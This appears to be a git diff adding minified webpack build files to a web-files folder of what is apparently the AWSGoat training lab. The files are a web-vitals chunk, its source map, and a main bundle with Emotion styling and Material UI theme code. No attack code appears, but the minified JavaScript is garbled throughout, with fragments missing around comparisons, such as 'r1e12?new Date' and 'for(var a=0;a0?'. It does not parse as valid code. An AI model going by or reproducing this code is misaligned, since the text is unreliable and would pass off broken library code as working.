b/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js new file mode 100644 index 0000000..a64e332 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js @@ -0,0 +1,2 @@ +"use strict";(self.webpackChunkawsgoat=self.webpackChunkawsgoat||[]).push([[787],{787:function(e,t,n){n.r(t),n.d(t,{getCLS:function(){return y},getFCP:function(){return g},getFID:function(){return C},getLCP:function(){return P},getTTFB:function(){return D}});var i,r,a,o,u=function(e,t){return{name:e,value:void 0===t?-1:t,delta:0,entries:[],id:"v2-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12)}},c=function(e,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){if("first-input"===e&&!("PerformanceEventTiming"in self))return;var n=new 
PerformanceObserver((function(e){return e.getEntries().map(t)}));return n.observe({type:e,buffered:!0}),n}}catch(e){}},f=function(e,t){var n=function n(i){"pagehide"!==i.type&&"hidden"!==document.visibilityState||(e(i),t&&(removeEventListener("visibilitychange",n,!0),removeEventListener("pagehide",n,!0)))};addEventListener("visibilitychange",n,!0),addEventListener("pagehide",n,!0)},s=function(e){addEventListener("pageshow",(function(t){t.persisted&&e(t)}),!0)},m=function(e,t,n){var i;return function(r){t.value>=0&&(r||n)&&(t.delta=t.value-(i||0),(t.delta||void 0===i)&&(i=t.value,e(t)))}},v=-1,p=function(){return"hidden"===document.visibilityState?0:1/0},d=function(){f((function(e){var t=e.timeStamp;v=t}),!0)},l=function(){return v<0&&(v=p(),d(),s((function(){setTimeout((function(){v=p(),d()}),0)}))),{get firstHiddenTime(){return v}}},g=function(e,t){var n,i=l(),r=u("FCP"),a=function(e){"first-contentful-paint"===e.name&&(f&&f.disconnect(),e.startTime-1&&e(t)},r=u("CLS",0),a=0,o=[],v=function(e){if(!e.hadRecentInput){var t=o[0],i=o[o.length-1];a&&e.startTime-i.startTime<1e3&&e.startTime-t.startTime<5e3?(a+=e.value,o.push(e)):(a=e.value,o=[e]),a>r.value&&(r.value=a,r.entries=o,n())}},p=c("layout-shift",v);p&&(n=m(i,r,t),f((function(){p.takeRecords().map(v),n(!0)})),s((function(){a=0,T=-1,r=u("CLS",0),n=m(i,r,t)})))},E={passive:!0,capture:!0},w=new Date,L=function(e,t){i||(i=t,r=e,a=new Date,F(removeEventListener),S())},S=function(){if(r>=0&&r1e12?new Date:performance.now())-e.timeStamp;"pointerdown"==e.type?function(e,t){var n=function(){L(e,t),r()},i=function(){r()},r=function(){removeEventListener("pointerup",n,E),removeEventListener("pointercancel",i,E)};addEventListener("pointerup",n,E),addEventListener("pointercancel",i,E)}(t,e):L(t,e)}},F=function(e){["mousedown","keydown","touchstart","pointerdown"].forEach((function(t){return e(t,b,E)}))},C=function(e,t){var n,a=l(),v=u("FID"),p=function(e){e.startTimeperformance.now())return;n.entries=[t],e(n)}catch(e){}},"complete"===document.readyState?setTimeout(t,0):addEventListener("load",(function(){return setTimeout(t,0)}))}}}]); +//# sourceMappingURL=787.8c65ad62.chunk.js.map \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js.map b/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js.map new file mode 100644 index 0000000..3b0eb0d --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js.map @@ -0,0 +1 @@ 
+{"version":3,"file":"static/js/787.8c65ad62.chunk.js","mappings":"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","sources":["../node_modules/web-vitals/dist/web-vitals.js"],"sourcesContent":["var e,t,n,i,r=function(e,t){return{name:e,value:void 0===t?-1:t,delta:0,entries:[],id:\"v2-\".concat(Date.now(),\"-\").concat(Math.floor(8999999999999*Math.random())+1e12)}},a=function(e,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){if(\"first-input\"===e&&!(\"PerformanceEventTiming\"in self))return;var n=new PerformanceObserver((function(e){return e.getEntries().map(t)}));return n.observe({type:e,buffered:!0}),n}}catch(e){}},o=function(e,t){var n=function n(i){\"pagehide\"!==i.type&&\"hidden\"!==document.visibilityState||(e(i),t&&(removeEventListener(\"visibilitychange\",n,!0),removeEventListener(\"pagehide\",n,!0)))};addEventListener(\"visibilitychange\",n,!0),addEventListener(\"pagehide\",n,!0)},u=function(e){addEventListener(\"pageshow\",(function(t){t.persisted&&e(t)}),!0)},c=function(e,t,n){var i;return function(r){t.value>=0&&(r||n)&&(t.delta=t.value-(i||0),(t.delta||void 0===i)&&(i=t.value,e(t)))}},f=-1,s=function(){return\"hidden\"===document.visibilityState?0:1/0},m=function(){o((function(e){var t=e.timeStamp;f=t}),!0)},v=function(){return f<0&&(f=s(),m(),u((function(){setTimeout((function(){f=s(),m()}),0)}))),{get firstHiddenTime(){return f}}},d=function(e,t){var n,i=v(),o=r(\"FCP\"),f=function(e){\"first-contentful-paint\"===e.name&&(m&&m.disconnect(),e.startTime-1&&e(t)},f=r(\"CLS\",0),s=0,m=[],v=function(e){if(!e.hadRecentInput){var t=m[0],i=m[m.length-1];s&&e.startTime-i.startTime<1e3&&e.startTime-t.startTime<5e3?(s+=e.value,m.push(e)):(s=e.value,m=[e]),s>f.value&&(f.value=s,f.entries=m,n())}},h=a(\"layout-shift\",v);h&&(n=c(i,f,t),o((function(){h.takeRecords().map(v),n(!0)})),u((function(){s=0,l=-1,f=r(\"CLS\",0),n=c(i,f,t)})))},T={passive:!0,capture:!0},y=new Date,g=function(i,r){e||(e=r,t=i,n=new Date,w(removeEventListener),E())},E=function(){if(t>=0&&t1e12?new Date:performance.now())-e.timeStamp;\"pointerdown\"==e.type?function(e,t){var 
n=function(){g(e,t),r()},i=function(){r()},r=function(){removeEventListener(\"pointerup\",n,T),removeEventListener(\"pointercancel\",i,T)};addEventListener(\"pointerup\",n,T),addEventListener(\"pointercancel\",i,T)}(t,e):g(t,e)}},w=function(e){[\"mousedown\",\"keydown\",\"touchstart\",\"pointerdown\"].forEach((function(t){return e(t,S,T)}))},L=function(n,f){var s,m=v(),d=r(\"FID\"),p=function(e){e.startTimeperformance.now())return;n.entries=[t],e(n)}catch(e){}},\"complete\"===document.readyState?setTimeout(t,0):addEventListener(\"load\",(function(){return setTimeout(t,0)}))};export{h as getCLS,d as getFCP,L as getFID,F as getLCP,P as getTTFB};\n"],"names":["e","t","n","i","r","name","value","delta","entries","id","concat","Date","now","Math","floor","random","a","PerformanceObserver","supportedEntryTypes","includes","self","getEntries","map","observe","type","buffered","o","document","visibilityState","removeEventListener","addEventListener","u","persisted","c","f","s","m","timeStamp","v","setTimeout","firstHiddenTime","d","disconnect","startTime","push","window","performance","getEntriesByName","requestAnimationFrame","p","l","h","hadRecentInput","length","takeRecords","T","passive","capture","y","g","w","E","entryType","target","cancelable","processingStart","forEach","S","L","b","F","once","P","getEntriesByType","timing","max","navigationStart","responseStart","readyState"],"sourceRoot":""} \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/js/main.adc6b28e.js b/modules/module-1/resources/storage_account/webfiles/build/static/js/main.adc6b28e.js new file mode 100644 index 0000000..af5c059 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/js/main.adc6b28e.js @@ -0,0 +1,3 @@ +/*! 
For license information please see main.adc6b28e.js.LICENSE.txt */ +!function(){var e={5318:function(e){e.exports=function(e){return e&&e.__esModule?e:{default:e}},e.exports.__esModule=!0,e.exports.default=e.exports},76:function(e,a,n){"use strict";n.d(a,{Z:function(){return te}});var i=function(){function e(e){var a=this;this._insertTag=function(e){var n;n=0===a.tags.length?a.insertionPoint?a.insertionPoint.nextSibling:a.prepend?a.container.firstChild:a.before:a.tags[a.tags.length-1].nextSibling,a.container.insertBefore(e,n),a.tags.push(e)},this.isSpeedy=void 0===e.speedy||e.speedy,this.tags=[],this.ctr=0,this.nonce=e.nonce,this.key=e.key,this.container=e.container,this.prepend=e.prepend,this.insertionPoint=e.insertionPoint,this.before=null}var a=e.prototype;return a.hydrate=function(e){e.forEach(this._insertTag)},a.insert=function(e){this.ctr%(this.isSpeedy?65e3:1)===0&&this._insertTag(function(e){var a=document.createElement("style");return a.setAttribute("data-emotion",e.key),void 0!==e.nonce&&a.setAttribute("nonce",e.nonce),a.appendChild(document.createTextNode("")),a.setAttribute("data-s",""),a}(this));var a=this.tags[this.tags.length-1];if(this.isSpeedy){var n=function(e){if(e.sheet)return e.sheet;for(var a=0;a0?c(y,--b):0,v--,10===k&&(v=1,f--),k}function w(){return k=b2||P(k)>3?"":" "}function N(e,a){for(;--a&&w()&&!(k<48||k>102||k>57&&k<65||k>70&&k<97););return C(e,j()+(a<6&&32==M()&&32==w()))}function E(e){for(;w();)switch(k){case e:return b;case 34:case 39:34!==e&&39!==e&&E(k);break;case 40:41===e&&E(e);break;case 92:w()}return b}function R(e,a){for(;w()&&e+k!==57&&(e+k!==84||47!==M()););return"/*"+C(a,b-1)+"*"+r(47===e?e:w())}function K(e){for(;!P(M());)w();return C(e,b)}var D="-ms-",_="-moz-",H="-webkit-",O="comm",V="rule",F="decl",G="@keyframes";function I(e,a){for(var n="",i=p(e),t=0;t6)switch(c(e,a+1)){case 109:if(45!==c(e,a+4))break;case 102:return l(e,/(.+:)(.+)-([^]+)/,"$1-webkit-$2-$3$1"+_+(108==c(e,a+3)?"$3":"$2-$3"))+e;case 115:return~u(e,"stretch")?J(l(e,"stretch","fill-available"),a)+e:e}break;case 4949:if(115!==c(e,a+1))break;case 6444:switch(c(e,h(e)-3-(~u(e,"!important")&&10))){case 107:return l(e,":",":"+H)+e;case 101:return l(e,/(.+:)([^;!]+)(;|!.+)?/,"$1"+H+(45===c(e,14)?"inline-":"")+"box$3$1"+H+"$2$3$1"+D+"$2box$3")+e}break;case 5936:switch(c(e,a+11)){case 114:return H+e+D+l(e,/[svh]\w+-[tblr]{2}/,"tb")+e;case 108:return H+e+D+l(e,/[svh]\w+-[tblr]{2}/,"tb-rl")+e;case 45:return H+e+D+l(e,/[svh]\w+-[tblr]{2}/,"lr")+e}return H+e+D+e+e}return e}function W(e){return T(U("",null,null,null,[""],e=B(e),0,[0],e))}function U(e,a,n,i,t,o,s,c,d){for(var p=0,f=0,v=s,g=0,b=0,k=0,y=1,x=1,S=1,C=0,P="",B=t,T=o,E=i,D=P;x;)switch(k=C,C=w()){case 40:if(108!=k&&58==D.charCodeAt(v-1)){-1!=u(D+=l(L(C),"&","&\f"),"&\f")&&(S=-1);break}case 34:case 39:case 91:D+=L(C);break;case 9:case 10:case 13:case 32:D+=z(k);break;case 92:D+=N(j()-1,7);continue;case 47:switch(M()){case 42:case 47:m(Y(R(w(),j()),a,n),d);break;default:D+="/"}break;case 123*y:c[p++]=h(D)*S;case 125*y:case 59:case 0:switch(C){case 0:case 125:x=0;case 59+f:b>0&&h(D)-v&&m(b>32?X(D+";",i,n,v-1):X(l(D," ","")+";",i,n,v-2),d);break;case 59:D+=";";default:if(m(E=q(D,a,n,p,f,t,c,P,B=[],T=[],v),o),123===C)if(0===f)U(D,a,E,E,B,o,v,c,T);else switch(g){case 100:case 109:case 115:U(e,E,E,i&&m(q(e,E,E,0,0,t,c,P,t,B=[],v),T),t,T,v,c,i?B:T);break;default:U(D,E,E,E,[""],T,0,c,T)}}p=f=b=0,y=S=1,P=D="",v=s;break;case 58:v=1+h(D),b=k;default:if(y<1)if(123==C)--y;else if(125==C&&0==y++&&125==A())continue;switch(D+=r(C),C*y){case 
38:S=f>0?1:(D+="\f",-1);break;case 44:c[p++]=(h(D)-1)*S,S=1;break;case 64:45===M()&&(D+=L(w())),g=M(),f=v=h(P=D+=K(j())),C++;break;case 45:45===k&&2==h(D)&&(y=0)}}return o}function q(e,a,n,i,r,o,u,c,h,m,f){for(var v=r-1,g=0===r?o:[""],b=p(g),k=0,y=0,S=0;k0?g[A]+" "+w:l(w,/&\f/g,g[A])))&&(h[S++]=M);return x(e,a,n,0===r?V:c,h,m,f)}function Y(e,a,n){return x(e,a,n,O,r(k),d(e,2,-2),0)}function X(e,a,n,i){return x(e,a,n,F,d(e,0,i),d(e,i+1,-1),i)}var Q=function(e,a,n){for(var i=0,t=0;i=t,t=M(),38===i&&12===t&&(a[n]=1),!P(t);)w();return C(e,b)},$=function(e,a){return T(function(e,a){var n=-1,i=44;do{switch(P(i)){case 0:38===i&&12===M()&&(a[n]=1),e[n]+=Q(b-1,a,n);break;case 2:e[n]+=L(i);break;case 4:if(44===i){e[++n]=58===M()?"&\f":"",a[n]=e[n].length;break}default:e[n]+=r(i)}}while(i=w());return e}(B(e),a))},ee=new WeakMap,ae=function(e){if("rule"===e.type&&e.parent&&!(e.length<1)){for(var a=e.value,n=e.parent,i=e.column===n.column&&e.line===n.line;"rule"!==n.type;)if(!(n=n.parent))return;if((1!==e.props.length||58===a.charCodeAt(0)||ee.get(n))&&!i){ee.set(e,!0);for(var t=[],r=$(a,t),o=n.props,s=0,l=0;s-1&&!e.return)switch(e.type){case F:e.return=J(e.value,e.length);break;case G:return I([S(e,{value:l(e.value,"@","@"+H)})],i);case V:if(e.length)return function(e,a){return e.map(a).join("")}(e.props,(function(a){switch(function(e,a){return(e=a.exec(e))?e[0]:e}(a,/(::plac\w+|:read-\w+)/)){case":read-only":case":read-write":return I([S(e,{props:[l(a,/:(read-\w+)/,":-moz-$1")]})],i);case"::placeholder":return I([S(e,{props:[l(a,/:(plac\w+)/,":-webkit-input-$1")]}),S(e,{props:[l(a,/:(plac\w+)/,":-moz-$1")]}),S(e,{props:[l(a,/:(plac\w+)/,D+"input-$1")]})],i)}return""}))}}],te=function(e){var a=e.key;if("css"===a){var n=document.querySelectorAll("style[data-emotion]:not([data-s])");Array.prototype.forEach.call(n,(function(e){-1!==e.getAttribute("data-emotion").indexOf(" ")&&(document.head.appendChild(e),e.setAttribute("data-s",""))}))}var t=e.stylisPlugins||ie;var r,o,s={},l=[];r=e.container||document.head,Array.prototype.forEach.call(document.querySelectorAll('style[data-emotion^="'+a+' "]'),(function(e){for(var a=e.getAttribute("data-emotion").split(" "),n=1;n=4;++i,t-=4)a=1540483477*(65535&(a=255&e.charCodeAt(i)|(255&e.charCodeAt(++i))<<8|(255&e.charCodeAt(++i))<<16|(255&e.charCodeAt(++i))<<24))+(59797*(a>>>16)<<16),n=1540483477*(65535&(a^=a>>>24))+(59797*(a>>>16)<<16)^1540483477*(65535&n)+(59797*(n>>>16)<<16);switch(t){case 3:n^=(255&e.charCodeAt(i+2))<<16;case 2:n^=(255&e.charCodeAt(i+1))<<8;case 1:n=1540483477*(65535&(n^=255&e.charCodeAt(i)))+(59797*(n>>>16)<<16)}return(((n=1540483477*(65535&(n^=n>>>13))+(59797*(n>>>16)<<16))^n>>>15)>>>0).toString(36)},t=n(3840),r=n(3782),o=/[A-Z]|^ms/g,s=/_EMO_([^_]+?)_([^]*?)_EMO_/g,l=function(e){return 45===e.charCodeAt(1)},u=function(e){return null!=e&&"boolean"!==typeof e},c=(0,r.Z)((function(e){return l(e)?e:e.replace(o,"-$&").toLowerCase()})),d=function(e,a){switch(e){case"animation":case"animationName":if("string"===typeof a)return a.replace(s,(function(e,a,n){return p={name:a,styles:n,next:p},a}))}return 1===t.Z[e]||l(e)||"number"!==typeof a||0===a?a:a+"px"};function h(e,a,n){if(null==n)return"";if(void 0!==n.__emotion_styles)return n;switch(typeof n){case"boolean":return"";case"object":if(1===n.anim)return p={name:n.name,styles:n.styles,next:p},n.name;if(void 0!==n.styles){var i=n.next;if(void 0!==i)for(;void 0!==i;)p={name:i.name,styles:i.styles,next:p},i=i.next;return n.styles+";"}return function(e,a,n){var i="";if(Array.isArray(n))for(var t=0;t0&&void 
0!==arguments[0]?arguments[0]:"light")?{main:v[200],light:v[50],dark:v[400]}:{main:v[700],light:v[400],dark:v[800]}}(n),j=e.secondary||function(){return"dark"===(arguments.length>0&&void 0!==arguments[0]?arguments[0]:"light")?{main:p[200],light:p[50],dark:p[400]}:{main:p[500],light:p[300],dark:p[700]}}(n),C=e.error||function(){return"dark"===(arguments.length>0&&void 0!==arguments[0]?arguments[0]:"light")?{main:m[500],light:m[300],dark:m[700]}:{main:m[700],light:m[400],dark:m[800]}}(n),P=e.info||function(){return"dark"===(arguments.length>0&&void 0!==arguments[0]?arguments[0]:"light")?{main:g[400],light:g[300],dark:g[700]}:{main:g[700],light:g[500],dark:g[900]}}(n),B=e.success||function(){return"dark"===(arguments.length>0&&void 0!==arguments[0]?arguments[0]:"light")?{main:b[400],light:b[300],dark:b[700]}:{main:b[800],light:b[500],dark:b[900]}}(n),T=e.warning||function(){return"dark"===(arguments.length>0&&void 0!==arguments[0]?arguments[0]:"light")?{main:f[400],light:f[300],dark:f[700]}:{main:"#ed6c02",light:f[500],dark:f[900]}}(n);function L(e){return(0,c.mi)(e,x.text.primary)>=s?x.text.primary:y.text.primary}var z=function(e){var a=e.color,n=e.name,t=e.mainShade,r=void 0===t?500:t,o=e.lightShade,s=void 0===o?300:o,l=e.darkShade,c=void 0===l?700:l;if(!(a=(0,i.Z)({},a)).main&&a[r]&&(a.main=a[r]),!a.hasOwnProperty("main"))throw new Error((0,u.Z)(11,n?" (".concat(n,")"):"",r));if("string"!==typeof a.main)throw new Error((0,u.Z)(12,n?" (".concat(n,")"):"",JSON.stringify(a.main)));return S(a,"light",s,A),S(a,"dark",c,A),a.contrastText||(a.contrastText=L(a.main)),a},N={dark:x,light:y};return(0,r.Z)((0,i.Z)({common:d,mode:n,primary:z({color:M,name:"primary"}),secondary:z({color:j,name:"secondary",mainShade:"A400",lightShade:"A200",darkShade:"A700"}),error:z({color:C,name:"error"}),warning:z({color:T,name:"warning"}),info:z({color:P,name:"info"}),success:z({color:B,name:"success"}),grey:h,contrastThreshold:s,getContrastText:L,augmentColor:z,tonalOffset:A},N[n]),w)}var w=["fontFamily","fontSize","fontWeightLight","fontWeightRegular","fontWeightMedium","fontWeightBold","htmlFontSize","allVariants","pxToRem"];var M={textTransform:"uppercase"},j='"Roboto", "Helvetica", "Arial", sans-serif';function C(e,a){var n="function"===typeof a?a(e):a,o=n.fontFamily,s=void 0===o?j:o,l=n.fontSize,u=void 0===l?14:l,c=n.fontWeightLight,d=void 0===c?300:c,h=n.fontWeightRegular,p=void 0===h?400:h,m=n.fontWeightMedium,f=void 0===m?500:m,v=n.fontWeightBold,g=void 0===v?700:v,b=n.htmlFontSize,k=void 0===b?16:b,y=n.allVariants,x=n.pxToRem,S=(0,t.Z)(n,w);var A=u/14,C=x||function(e){return"".concat(e/k*A,"rem")},P=function(e,a,n,t,r){return(0,i.Z)({fontFamily:s,fontWeight:e,fontSize:C(a),lineHeight:n},s===j?{letterSpacing:"".concat((o=t/a,Math.round(1e5*o)/1e5),"em")}:{},r,y);var o},B={h1:P(d,96,1.167,-1.5),h2:P(d,60,1.2,-.5),h3:P(p,48,1.167,0),h4:P(p,34,1.235,.25),h5:P(p,24,1.334,0),h6:P(f,20,1.6,.15),subtitle1:P(p,16,1.75,.15),subtitle2:P(f,14,1.57,.1),body1:P(p,16,1.5,.15),body2:P(p,14,1.43,.15),button:P(f,14,1.75,.4,M),caption:P(p,12,1.66,.4),overline:P(p,12,2.66,1,M)};return(0,r.Z)((0,i.Z)({htmlFontSize:k,pxToRem:C,fontFamily:s,fontSize:u,fontWeightLight:d,fontWeightRegular:p,fontWeightMedium:f,fontWeightBold:g},B),S,{clone:!1})}function P(){return["".concat(arguments.length<=0?void 0:arguments[0],"px ").concat(arguments.length<=1?void 0:arguments[1],"px ").concat(arguments.length<=2?void 0:arguments[2],"px ").concat(arguments.length<=3?void 0:arguments[3],"px 
